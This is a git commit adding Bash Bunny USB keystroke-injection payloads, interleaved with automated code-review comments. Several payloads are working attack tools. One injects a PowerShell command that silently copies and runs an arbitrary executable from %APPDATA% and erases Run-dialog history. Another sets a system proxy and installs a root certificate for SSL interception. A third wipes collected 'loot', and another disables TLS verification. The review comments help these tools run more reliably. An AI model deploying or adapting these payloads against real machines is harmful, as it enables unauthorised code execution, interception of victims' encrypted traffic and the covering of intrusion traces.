Cleanup: Sort payloads by category

Sebastian Kinne
2017-04-10 13:29:17 +10:00
parent 288d90c60e
commit 85b1bc7aca
513 changed files with 2 additions and 361 deletions


@@ -0,0 +1,74 @@
#!/usr/bin/env bash
# Based on bashbunnypayloads installer
# https://github.com/hak5/bashbunny-payloads/blob/master/payloads/library/tools_installer/install.sh
# Check Switch Position
source bunny_helpers.sh
TARGET_DIR='/root/tools'
RELEASE_ARCHIVE=$(find /root/udisk/payloads/${SWITCH_POSITION} -name DuckToolkit-*)
echo "Install Log:" > /tmp/duck_installer.log
echo "----------------" >> /tmp/duck_installer.log
if [ -f ${RELEASE_ARCHIVE} ]; then
echo "Found ${RELEASE_ARCHIVE}" >> /tmp/duck_installer.log
else
LED R
echo "No ducktoolkit release found" >> /tmp/duck_installer.log
exit 1
fi
# Set LED to purple blinking and move files
LED R B 100
# Backup Existing library
if [ -d "$TARGET_DIR/DuckToolkit" ]; then
echo "Library Exists; removing" >> /tmp/duck_installer.log
rm -rf ${TARGET_DIR}/DuckToolkit
fi
echo "Copying files to target dir" >> /tmp/duck_installer.log
cp ${RELEASE_ARCHIVE} ${TARGET_DIR}
cd ${TARGET_DIR}
tar zxf DuckToolkit-* && mv $(find . -name "DuckToolkit-*" ! -name "*.gz") DuckToolkit && rm DuckToolkit*.tar.gz
echo "Move Complete" >> /tmp/duck_installer.log
# Set LED to purple solid and check that move completed
LED R B
if ! [ -d "${TARGET_DIR}/DuckToolkit" ]; then
# Set LED to red on fail and exit
LED R
echo "Failed to copy files to target dir" >> /tmp/duck_installer.log
exit 1
else
# Set LED to amber blinking on setup
LED G R 100
# Set calling script executable
chmod +x ${TARGET_DIR}/DuckToolkit/bunnyducky.py
# Update Q and QUACK to use the new library
echo "Update Q" >> /tmp/duck_installer.log
cat <<'EOF' > /root/Q
#!/bin/sh
# Input parameters;
strparam="$@"
/root/tools/DuckToolkit/bunnyducky.py -l $DUCKY_LANG "$strparam" >> /root/ducklog.txt
exit 0
EOF
echo "Update QUACK" >> /tmp/duck_installer.log
cat <<'EOF' > /root/QUACK
#!/bin/sh
# Input parameters;
strparam="$@"
/root/tools/DuckToolkit/bunnyducky.py -l $DUCKY_LANG "$strparam" >> /root/ducklog.txt
exit 0
EOF
# LED To green for complete
LED R G B
fi
cp /tmp/duck_installer.log /root/udisk/payloads/${SWITCH_POSITION}/install_log.txt
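Review bot: The archive check `if [ -f ${RELEASE_ARCHIVE} ]` passes when `find` returns nothing, because the unquoted empty expansion leaves `[ -f ]`, a one-argument test that is always true. The "No ducktoolkit release found" branch is then unreachable, and the script goes on to `rm -rf` the installed library before failing at `cp`. Quote the expansion and test for emptiness, `if [ -n "${RELEASE_ARCHIVE}" ] && [ -f "${RELEASE_ARCHIVE}" ]; then`, and quote the pattern as `-name 'DuckToolkit-*'` so the shell cannot expand it against the current directory. The archive is unpacked as root into /root/tools with no integrity check visible here, so comparing it against an expected checksum before `tar zxf` would be worth adding.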


@@ -0,0 +1,3 @@
# Install payload for the DuckToolkit
# See install.sh and readme.txt for details
ATTACKMODE ECM_ETHERNET STORAGE


@@ -0,0 +1,14 @@
DuckToolkit installer for Bash Bunny.
Adds support for new languages. and uses the Ducktoolkit python library for encoding.
Version 1.0.0
Moves the libary files to /tools
Update Q and QUACK to point to the new library
Writes error to /root/ducky.log
Purple Blinking.................Moving tools
Purple Solid....................Tools moved
Amber Blinking..................Setup tools
Red Solid.......................Tool installation failed
White Solid.....................Installation completed successfully


@@ -0,0 +1,9 @@
DELAY 2000
GUI r
DELAY 1000
STRING notepad.exe
DELAY 100
ENTER
DELAY 3000
STRING https://bunnytoolkit.com running Ducky Script on a Bash Bunny
Enter


@@ -0,0 +1,18 @@
LED G
ATTACKMODE HID STORAGE
# Set your language here
LANGUAGE='us'
LED R G
# Check for switch position to make it easier for us.
source bunny_helpers.sh
if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
QUACK ${SWITCH_POSITION}/ducky_script.txt
LED G
else
LED R
echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
exit 1
fi
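Review bot: `LANGUAGE='us'` appears to have no effect: it is a plain shell variable that nothing in this file reads, while the Q/QUACK wrapper written by the DuckToolkit installer in this same commit passes `-l $DUCKY_LANG` to the encoder. If that wrapper is what runs here, the setting should be `export DUCKY_LANG='us'`, or the wrapper should read LANGUAGE; bunny_helpers.sh is not visible, so confirm which name the firmware expects. The path argument should also be quoted, `QUACK "${SWITCH_POSITION}/ducky_script.txt"`.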


@@ -0,0 +1,25 @@
# Ducky Script Template for Bash Bunnys
Author: @kevthehermit
Version: Version 1.0
## Description
Boiler Plate for running ducky scripts on the Bash Bunny
## Configuration
HID or HID STORAGE
## Requirements
Install DuckToolkit payload for extra language support
## STATUS
| LED | Status |
| ---------------- | ------------------------------------- |
| Red | Failed to open script file |
| Amber | Script Running |
| Green | Finished |


@@ -0,0 +1,4 @@
@echo off
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
cscript %~dp0\i.vbs %~dp0\e.cmd
@exit


@@ -0,0 +1,23 @@
@echo off
@echo Installing Windows Update
REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
REM Below is for copying a directory with a payload inside the root directory of the Bash Bunny USB Mass Storage.
REM echo d | xcopy /C /Q /Y /E %~dp0\..\..\PAYLOAD_FOLDER_IN_ROOT %APPDATA%\PAYLOAD_FOLDER_IN_ROOT
REM Copy payload.exe from the root of the bash Bash Bunny USB Mass Storage (change to whatever you like).
copy %~dp0\..\..\payload.exe %APPDATA%\payload.exe
REM Below is for executing a payload inside a directory (see comments above). Change --startup to whatever parameters you wish to pass (or remove it).
REM start "" "%APPDATA%\PAYLOAD_FOLDER_IN_ROOT\payload.exe" --startup
REM Launch payload.exe with the startup parameter. Change --startup to whatever parameters you wish to pass (or remove it).
start "" "%APPDATA%\payload.exe" --startup
REM Blink CAPSLOCK key (from usb_exfiltrator)
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
@cls
@exit


@@ -0,0 +1 @@
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False


@@ -0,0 +1,25 @@
#!/bin/bash
#
# Title: ExecutableInstaller
# Author: IMcPwn
# Version: 1.0
# Target: Windows 7+
#
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn executes e.cmd invisibly using i.vbs
# which in turn copies payload.exe from the root of the Bash Bunny and then executes it
# using the --startup parameter. Change these settings inside of e.cmd.
#
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED R
ATTACKMODE HID STORAGE
QUACK GUI r
QUACK DELAY 100
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
QUACK ENTER
# Green LED for finished
LED G


@@ -0,0 +1,27 @@
# ExecutableInstaller for Bash Bunnys
* Author: IMcPwn
* Version: Version 1.0
* Target: Windows
## Description
Copies an executable (or executable in a directory) from the Bash Bunny USB Mass Storage
to %APPDATA% and then executes it with the --startup parameter (or whatever parameter you want).
## Configuration
By default the staged payload copies the payload payload.exe from the root of the Bash Bunny, rename this to whatever you like inside
by editing e.cmd.
The payload copies to %APPDATA%, change this to wherever you like by editing e.cmd.
You may also copy a payload inside a directory, see comments in e.cmd.
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Red | Attack Setup |
| Green | Attack Complete |
## Discussion
[Hak5 Forum Thread](https://forums.hak5.org/index.php?/forum/92-bash-bunny/ "Hak5 Forum Thread")


@@ -0,0 +1,33 @@
# Git-Bunny-Git
Author: Draxiom & audibleblink & Nicholas Adamou
Version: 1.0
## Description
Clones the bashbunny-payloads repository and also will update an existing repository. Use this payload to get all the other payloads!
## Configuration
Configured for nix by default. Swap RNDIS_ETHERNET with ECM_ETHERNET on Windows
## Requirements
Target must be sharing internet. BashBunny must have git installed.
1. Run bb.sh (pause at main menu)
2. Plug in da bunny
3. Connect (type 'c') 5 seconds after the white light
4. You can now ssh into the bunny (Run `tail -f /tmp/git` to montior progress)
## Status
| LED | Status |
| ---------------- | ------------------------------------- |
| White | Ready (to share internet connection) |
| Red | Failed (no internet) |
| Red (blinking) | Failed (could not mount filesystem) |
| Amber | Running |
| Purple | Cleaning Up |
| Green (blinking) | Finished (git pull) |
| Green | Finished (git clone) |


@@ -0,0 +1,84 @@
#!/bin/bash
# Title: Git Bunny Git
# Author: Draxiom && audibleblink && Nicholas Adamou
# Target: any
# Version: 1.1
#
# Update payloads from Github
#
# White | Ready (to run bb.sh on the host computer)
# Red | No Internet
# Red (blinking) | Could not mount filesystem
# Amber | Running
# Green (blinking) | Git Pull Finished
# Green | Git Clone Finished
LED W
#ATTACKMODE RNDIS_ETHERNET
ATTACKMODE ECM_ETHERNET
# Set your desired repo url and branch if you're not looking to update from mainline
git_repo="https://github.com/hak5/bashbunny-payloads.git"
git_branch="master"
payloads_dir="/root/udisk"
log_file="/var/log/git.log"
if [ -f "$log_file" ]; then
rm -rf "$log_file"
fi
echo " --------- Git Bunny Git [started] -----------" >> $log_file
# Sanity check on mounted drive
[[ ! `mount | grep "nandf"` ]] && { LED R DOUBLE; echo "Could not mount filesystem" >> $log_file; exit 1; }
# Test for internet connection
wget -q --tries=15 --timeout=5 --spider http://example.com
[[ "$?" -ne 0 ]] && { LED R; echo "Could not connect to the internet" >> $log_file; exit 1; }
# Let's go
LED Y
cd $payloads_dir
# Cannot verify ca certificate... skip it
export GIT_SSL_NO_VERIFY=1
if [ -d ".git" ]; then
# Get the newest payloads
git pull origin $git_branch &>> $log_file
echo "Git repository updated." >> $log_file
LED G SLOW
else
# Move the existing payloads directory, in case hackers be hackin'
mv payloads payloads-orig
echo "Existing 'payloads' directory preserved as 'payloads-orig'" >> $log_file
# Initialize Repository
git init &>> $log_file
# Let's pick the hak5 github repo
git remote add origin $git_repo &>> $log_file
echo "Git repository selected: $git_repo" >> $log_file
# Instead of cloning the whole repo,
git config core.sparsecheckout true
echo "Git configuration change: sparse-checkout=true." >> $log_file
# isolate the payloads directory
echo "payloads" >> .git/info/sparse-checkout
echo "Sparse checkout: 'payloads' directory selected" >> $log_file
# "git clone"
git pull origin $git_branch &>> $log_file
echo "Git repository cloned." >> $log_file
# Ignore any existing directories or files, so git status is pretty, and git pull will work after the "clone"
LED M
for file in $(ls -A); do
[[ "${file}" =~ [^payloads$] ]] && { echo "${file}" >> .gitignore; echo ".gitignore add: ${file}" >> $log_file; }
done
echo "payloads/switch*" >> .gitignore
echo ".gitignore add: payloads/switch*" >> $log_file;
# Put the existing switch directories back
cp -r payloads-orig/switch* payloads/.
# Git 'er done
LED G
fi
echo " --------- Git Bunny Git [finished] ----------" >> $log_file
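Review bot: `export GIT_SSL_NO_VERIFY=1` turns off TLS certificate verification for both `git pull origin $git_branch` calls, so the script accepts payload files from any endpoint that answers for the repository host on the shared connection, and those files are later run on the device. The comment says the CA certificate cannot be verified; that usually points to a missing CA bundle or a wrong device clock (an assumption, the cause is not visible here), and the fix belongs there, for example by pointing `GIT_SSL_CAINFO` at a CA bundle kept on the device, rather than by disabling the check. Separately, `[[ "${file}" =~ [^payloads$] ]]` is a negated bracket expression and not an anchored match, so it tests for any character outside that set; `[[ "${file}" != "payloads" ]]` says what the comment intends. The `for file in $(ls -A)` loop should iterate a glob instead of parsing `ls`, and `$log_file` and `$payloads_dir` should be quoted, with `cd "$payloads_dir" || exit 1`.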


@@ -0,0 +1,30 @@
#!/bin/bash
# Title: Infinite Control
# Author: Didier Stevens (https://DidierStevens.com)
# Version: 0.0.1 2017/04/08
#
# Hit the CONTROL key every 10 seconds in an infinite loop,
# while blinking the red LED with every keypress.
#
# Can be used to prevent a machine from sleeping or auto-locking.
#
# WARNING: Do not type on the machine's keyboard while this script
# is running, or your keystrokes might become commands,
# for example CTRL-Q: Quit
#
# Red ...............Hitting CONTROL key
# Red Blinking.......Wow! We broke out of the infinite while loop!
ATTACKMODE HID
# infinite while loop
while true
do
LED R
QUACK CTRL
LED
sleep 10
done
# this code will never be reached
LED R 100


@@ -0,0 +1,17 @@
# Infinite Control For Bash Bunny
Author: Didier Stevens
Version: Version 0.0.1
## Description
Hit the CONTROL key every 10 seconds in an infinite loop, while blinking the red LED with every keypress.
## STATUS
| LED | Status |
| ---------------- | ------------------------------------- |
| Red flash | CONTROL keypress |


@@ -0,0 +1,6 @@
#Import variables from vars.ps1 for use.
. .\vars.ps1
#Add certificate to certificate store
$certFile = ( Get-ChildItem -Path $certName )
$certFile | Import-Certificate -CertStoreLocation cert:\CurrentUser\Root


@@ -0,0 +1,30 @@
# Proxy Interceptor for Bash Bunny
Author: NightStalker
Version: 1.0
## Description
This payload will enable a proxy and import an SSL certificate to a Windows
computer for Internet Explorer and Chrome (FireFox is in progress for 2.0)
The script uses a combination of Ducky Code and PowerShell.
*Note: Currently no falure LED, if remains red for more than 60 seconds
script failed. Will build checks in later version.
## Requirements
Certificate needs to be in .pem format and in the root switch directory with
payload.txt, set the certificate and proxy information in the vars.ps1 file.
## STATUS
| LED | Status |
| ---------------- | ------------------------------------- |
| White (blinking) | Script Running. |
| Purple (blinging)| Script Complete. |
## Discussion
https://forums.hak5.org/index.php?/topic/40476-payload-proxy-interceptor/


@@ -0,0 +1,19 @@
#Import variables from vars.ps1 for use.
. .\vars.ps1
#Change the Execution Policy to RemoteSigned and see if Internet Explorere is running and if so close it.
Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
$ieProcess = Get-Process iexplore -ErrorAction SilentlyContinue
if ($ieProcess) {
$ieProcess.CloseMainWindow()
Sleep 5
if (!$ieProcess.HasExited) {
$ieProcess | Stop-Process -Force
}
}
Remove-Variable ieProcess
#Change the proxy settings in the registry
$regKey="HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
Set-ItemProperty -path $regKey ProxyEnable -value 1
Set-ItemProperty -path $regKey ProxyServer -value $proxyVal
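Review bot: `Set-ExecutionPolicy RemoteSigned -Scope CurrentUser` persistently changes the user's execution policy, and it looks redundant. Assuming this file is the SetProxy.ps1 that payload.txt launches, it is already started with `powershell -ExecutionPolicy RemoteSigned`, which applies to that process only, so the line could be dropped. Together with `ProxyEnable` and `ProxyServer` it is a setting that stays on the machine after the run, and the comments here do not say so. A header comment naming the values this script changes, and what they were expected to be before, would make the persistent state explicit for whoever has to revert or audit it.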


@@ -0,0 +1,4 @@
-----BEGIN CERTIFICATE-----
REPLACE WITH CORRECT VALID PEM FORMAT CERTIFICATE
FROM PROXY FOR SSL INTERCEPTION.
-----END CERTIFICATE-----


@@ -0,0 +1,65 @@
#!/bin/bash
#
# Title: Proxy Interceptor
# Author: NightStalker
# Version: 1.0
#
#This payload will enable a proxy and import an SSL certificate to a Windows
#computer for Internet Explorer and Chrome (FireFox is in progress for 2.0)
#The script uses a combination of Ducky Code and PowerShell.
#
# Set proxy and certificate varaibles in vars.ps1, certificate must be in same folder as payload.txt
#
# Red Blinking.............Running Payload
# Purple Blinking .........Payload Completed
#Set Red LED to indicate Starting of Script
LED R 50
#Set ATTACKMODE to HID and Storage to be able to transfer the certificate
ATTACKMODE HID STORAGE
#Import Bunny Helpers
source bunny_helpers.sh
#Start of Script
Q DELAY 6000
Q GUI r
Q DELAY 100
Q STRING POWERSHELL
Q ENTER
Q DELAY 100
#Change to the directory of the Bunny with the proper switch location
Q STRING \$driveLetter = \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\'\).Name
Q ENTER
Q STRING \$absPath = \$driveLetter\+\'payloads\\\'\+\'$SWITCH_POSITION\'\+\'\\\'
Q ENTER
Q STRING cd \$absPath
Q ENTER
Q DELAY 500
#Set the proxy in the internet settings in the registry (For IE and Chrome).
Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\SetProxy.ps1')"
Q ENTER
Q DELAY 500
#Import the certificate to the computer (for IE and Chrome).
Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\ImportCert.ps1')"
Q ENTER
Q DELAY 1000
Q ALT y
Q DELAY 500
#Unmount the USB Drive.
Q STRING \$driveEject = New-Object -comObject Shell.Application
Q ENTER
Q STRING \$driveEject.Namespace\(17\).ParseName\(\"\$driveLetter\"\).InvokeVerb\(\"Eject\"\)
Q ENTER
Q DELAY 500
Q ALT t
Q DELAY 500
Q STRING EXIT
Q ENTER
sync
LED R B 100


@@ -0,0 +1,3 @@
#Set variables for use in payload.
$proxyVal = "proxyip:port"
$certName = "cert.pem"


@@ -0,0 +1,20 @@
# dryClean
* Author: ricky5ive
* Version: Version 1.0
* Target: N/A
* Category: CYA
* Attackmodes: N/A
## Description
Removes loot directory along with contents. Will remove ANY loot directory located on the BashBunny
## STATUS
| LED | Status |
| ------------------- | -------------------------------------- |
| White (fast blink) | Running |
| Red (fast blink) | Failed to remove loot directory |
| Green | Finished |
| | |


@@ -0,0 +1,35 @@
#!/bin/bash
#
# Title: dryClean for Bash Bunny
# Author: ricky5ive
# Version: 1.0
#
# deletes files in the */loot folder/s
#
# White Blinking ........... Running
# Red ...................... Failed to wipe files
# Green .................... Done
#
#
LED R G B 100
# Create directory to mount the mass storage partition to
if [ ! -d /mnt/hotbuns]; then
mkdir /mnt/hotbuns
fi
# Mount mass storage partition
mount /dev/nandf /mnt/hotbuns
# Find all loot folders
# Delete all the loot folders and their contents
for i in `find / -name loot`; do
rm -rf $i
done
# Check to make sure loot folders are gone *blink RED == failed to remove*
if [ "`find / -name loot | wc -l`" -gt "0" ] ; then
LED R 100
else
LED G
fi
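Review bot: The directory test `if [ ! -d /mnt/hotbuns]; then` is missing the space before `]`, so `[` reports a missing bracket, the condition is false and `mkdir` never runs; the `mount` that follows is not checked either. The delete loop then word-splits the output of `find / -name loot` and passes it unquoted to `rm -rf`, which removes anything named loot (files as well as directories) anywhere on the filesystem and misbehaves on paths containing spaces. The version below creates the mount point with `mkdir -p`, stops on a failed mount, and lets `find` hand only directories to `rm` after `--`. If loot only ever lives on the storage partition, narrowing the search root from `/` to the mount point would be safer still.

```shell
mkdir -p /mnt/hotbuns
# Mount only if nothing is mounted there yet; stop if the mount fails
if ! mountpoint -q /mnt/hotbuns && ! mount /dev/nandf /mnt/hotbuns; then
  LED R 100
  exit 1
fi
# Delete only directories named loot; no word splitting, no option parsing of names
find / -type d -name loot -prune -exec rm -rf -- {} +
if [ -n "$(find / -type d -name loot -print -quit)" ]; then
# … unchanged: LED R 100 / LED G branches …
```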